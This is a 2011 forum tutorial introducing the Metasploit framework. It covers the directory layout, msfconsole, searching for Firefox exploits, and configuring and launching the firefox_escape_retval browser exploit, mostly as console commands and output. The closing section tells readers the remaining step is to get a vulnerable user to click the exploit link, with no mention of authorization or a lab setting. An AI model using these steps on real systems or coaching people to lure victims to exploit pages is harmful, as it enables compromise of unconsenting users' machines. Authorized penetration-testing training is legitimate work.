Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   How to get started with Metasploit (http://www.go4expert.com/articles/started-metasploit-t24743/)

lionaneesh 26Jan2011 20:11

How to get started with Metasploit
Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ...

This Project was started by H.D Moore and is now open source project managed by Rapid7

For Downloading and installing instructions Click here

I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below.

The directory structure

Metasplot have a very self-explanatory and a user-friendly directory structure..

The metasploit directory is located at /opt/metasploit3 in Linux


aneesh@aneesh-laptop:~$ cd /opt/metasploit3/

Lets see the different directories :-


aneesh@aneesh-laptop:/opt/metasploit3$ ls

app  bin  env.sh  lib  msf3  run.sh

aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/

aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls

armitage      HACKING  msfconsole  msfgui      msfpescan  plugins  tools

data          lib      msfd        msfmachscan  msfrpc    README

documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts

external      msfcli  msfencode  msfpayload  msfupdate  test


The Data directory : contains the basic data for exploits like php sources , wordlists etc etc...


aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/

aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls

armitage            isight.bundle            passivex  vncdll.dll

eicar.com            java                    php        vncdll.x64.dll

eicar.txt            lab                      post      wmap

emailer_config.yaml  meterpreter              snmp      wordlists

exploits            msfcrawler              sounds

gui                  msflinker_linux_x86.bin  sql

ipwn                msfpescan                templates

The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit

The main directory that is of great use to us is the modules directory


aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules

aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls

auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post


  • The exploit dir : contains the exploits for various architectures
  • The encoders dir : Contains varoius encoders for encoding pages , programs etc etc...
  • The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc..
  • The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution)

Getting to know Metasploit

The main part of metasploit is its interface types. The four main types of interfaces are :-
  1. msfweb (The Web Interface)
  2. msfgui (The graphical user interface)
  3. msfconsole (The console interface)
  4. msfcli (The command line interface)
The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial...

To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :-

aneesh@aneesh-laptop:~$ msfconsole

                                | |      o

 _  _  _    _ _|_  __,  ,    _  | |  __    _|_

/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |

  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/



      =[ metasploit v3.6.0-dev [core:3.6 api:1.0]

+ -- --=[ 643 exploits - 328 auxiliary

+ -- --=[ 216 payloads - 27 encoders - 8 nops

      =[ svn r11647 updated today (2011.01.26)

msf >

Now that we know how to open metasploit lets see some of its modules...

We use several commands for it :-

The show all command syntax - show all
The search command syntax - search (pattern)

For eg :-

Lets search for firefox exploits and see whats there in stores for us


msf > search firefox
[*] Searching loaded modules for pattern 'firefox'...



  Name                                              Disclosure Date  Rank      Description

  ----                                              ---------------  ----      -----------

  multi/browser/firefox_escape_retval              2006-07-14      normal    Firefox 3.5 escape() Return Value Memory Corruption

  multi/browser/firefox_queryinterface              2006-02-02      normal    Firefox location.QueryInterface() Code Execution

  multi/browser/mozilla_compareto                  2005-07-13      normal    Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution

  multi/browser/mozilla_navigatorjava              2006-07-25      normal    Mozilla Suite/Firefox Navigator Object Code Execution

  windows/browser/apple_quicktime_rtsp              2007-01-01      normal    Apple QuickTime 7.1.3 RTSP URI Buffer Overflow

  windows/browser/awingsoft_winds3d_sceneurl        2009-11-14      excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute

  windows/browser/dxstudio_player_exec              2009-06-09      excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

  windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28      great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

msf >

You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us...

This is the power of metasploit!!

lets use the 'use' command to select a exploit

Syntax :-

use (path)
Output :-

msf > use exploit/multi/browser/firefox_escape_retval

msf exploit(firefox_escape_retval) >

Now lets see the options.

show options
Output :-

msf exploit(firefox_escape_retval) > show options

Module options (exploit/multi/browser/firefox_escape_retval):

  Name        Current Setting  Required  Description

  ----        ---------------  --------  -----------

  SRVHOST          yes      The local host to listen on.

  SRVPORT    8080            yes      The local port to listen on.

  SSL        false            no        Negotiate SSL for incoming connections

  SSLVersion  SSL3            no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

  URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

  Id  Name

  --  ----

  0  Firefox 3.5.0 on Windows XP SP0-SP3

Let us now set the options

This can be done by using :-


set (option name) (value)
Now lets set some options according to our needs

msf exploit(firefox_escape_retval) > set SRVHOST localhost

SRVHOST => localhost

msf exploit(firefox_escape_retval) > set SRVPORT 80


msf exploit(firefox_escape_retval) > set URIPATH /exploit

URIPATH => /exploit

Explanations :-
  1. The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted..
  2. The 'set SRVPORT 80' means this is the Post no on which the server will be hosted
  3. As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit...

This means that we have to bring the victim to click on the page of url http://localhost/exploit
So as to make the exploit work!!

Now as the options are set lets run the exploit...

This can be done by :-


Output :-

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL: http://localhost:80/exploit
[*] Server started.

So the output states that we have successfully started the exploit!!

Now the work gets a lot more easier...

We just have to make a user with this Browser vulnerability click this link..

I hope it is enough to get you started working with metasploit...

lionaneesh 27Jan2011 16:46

Re: How to get started with Metasploit
Thanks Shabbir...
For accepting my articles and making it much better with the edits...

Thanks a ton!!!

All times are GMT +5.5. The time now is 21:21.